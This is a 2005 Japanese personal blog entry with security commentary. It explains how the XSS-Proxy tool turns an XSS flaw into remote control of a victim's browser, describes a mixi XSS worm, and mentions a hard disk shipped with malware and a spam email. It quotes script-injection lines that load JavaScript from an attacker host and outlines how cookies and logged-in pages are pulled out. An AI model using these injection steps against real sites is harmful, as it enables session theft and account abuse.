トップ 最新

糸の切れた凧( a threadless kite )

ここは、管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。ふんわりほんわかな感じでお願いします。

2005/11/23(水)水曜日ー。(面白ーい。)

[セキュリティ] * An advanced Cross-Site-Scripting attack tool,XSS-Proxy
最初、攻撃ツールかと思ったのですが、違いました。(^-^;  でも、かなり興味深い!!XSS の問題を利用して、被害者を、攻撃者サイト(XSS-Proxy)に数秒間隔でアクセスさせ、任意の URL へのアクセスや Cookie の送信などの命令をインタラクティブに実行させる手法のデモ。1.攻撃者側の準備 (http://attacker.example.jp/)(1) Perl の実行環境を準備。(2) XSS-Proxy をダウンロード&実行。 
(3) http://attacker.example.jp/ で XSS-Proxy が動作。(4) ブラウザで http://attacker.example.jp/admin にアクセス。 以後、適当なタイミングでリロードする。(被害者の接続を待つ。)2.XSS の問題があるサイト (http://vulnsite.example.jp/)攻撃者は、http://vulnsite.example.jp/ のどこかのページに、XSS 問題を利用して、「<script src="http://attacker.example.jp/xss2.js"></script>」*1を挿入する。3.被害者攻撃者に誘導されるなどして、スクリプト(*1) が挿入されたページにアクセス。 スクリプトが実行され、攻撃者サイトに情報(とりあえず、トップページのHTMLソース)が送信される。4.攻撃者 (http://attacker.example.jp/)(1) http://attacker.example.jp/admin に被害者からの接続が表示される。(2) Document Results: リンクをクリックすると、被害者が見たサイトのトップページ(http://vulnsite.example.jp/)が表示される。 そこに存在する URL をクリックすると、被害者側のブラウザに、クリックした URL を取得するように命令を送る! (実際には、被害者側のブラウザが数秒おきに命令の有無を確認しに、XSS-Proxy にアクセスしている。) (アクセスするのは被害者のブラウザなので、例えば、ログインが必要な画面なども(被害者がログインしていれば)取得することができる。)(3) URL を指定して、コンテンツを取得させる命令を送ることもできる。(4) document.cookie や document.domain の内容を送るよう命令することもできる。こんなインタラクティブに被害者のブラウザを操作できるなんて、興味深いですね。[出来事] * ポータブルハードディスク「HDP-Uシリーズ」ウイルス混入のお詫びと対処のご案内 (I-O DATA)
田中.ROMさんが * openmyaML に投げて
いました。
textile弊社ポータブルハードディスク「HDP-Uシリーズ」の一部製品型番の特定ロットに、ウイルスが混入している可能性があることが確認されました。
混入したのは、* WORM_TOMPAI.A
というトロイの木馬とのこと。 FAT32フォーマット済み&「iSPIS」(アイ・スパイス)と呼ばれるHDDロックツールを搭載した状態での出荷とのことなので、そこに混じったのかな? (ロット毎に原盤が違ってたりするものなんだろうか? そんなに簡単に混じれるものなのかな?)[雑談] 今日着たspam。今日着たspam、差出人が 横田めぐみ だった・・・。(^-^;
textileSubject: ('-'*)オヒサ♪最近メールくれないから、メールしちゃった><もう、このメールアドレス使わなくなるから連絡してみたよぉ〜風引いてるの?返事してよ?
URL等の記述は無し。 この文面だったら、差出人の名前でふざけてさえいなかったら、(女の子の友達多い人だったら)騙されるんじゃないかなぁ。 なんで 横田めぐみ にしたのか聞いてみたいwま、「X-Mailer: Easy DM free」だったのは減点ですけどw[出来事] mixi に「はまちちゃん」再来?!![](/image/img200511232129_hamachi2.PNG)現在は修正されているようですが、どうやら、アンケートに回答するCGI(reply_enquete.pl)の選択項目の部分に、XSS の問題があったようです。 (今回は CSRF じゃないかも知れません。) ページ中に、「<script src="http://xxxxxxxxxxxxx/bh6.js"></script>」を挿入して、外部の JavaScript を呼びに行っていたようです。(私が見に行った時には、すでに Not Found になっていたので、中身は見ていませんが。) このスクリプトによって、日記に写真のような文章が勝手に書き込まれてしまい、どんどん増殖していったようです。 1,200件くらいひっかかってますかね?(汗**[追記]** 今回の手法は、iframe で add_diary.pl を開き、その後の文書入力⇒確認画面⇒書き込み完了 の操作を JavaScript を用いて遷移させていたもののようです。 mixi では、確認画面で post_key というランダムな値を生成することで、一般的な CSRF への対策は済んでいましたが、今回のように XSS を悪用して 正常な流れで処理を行われたらどうしようもありませんね・・・。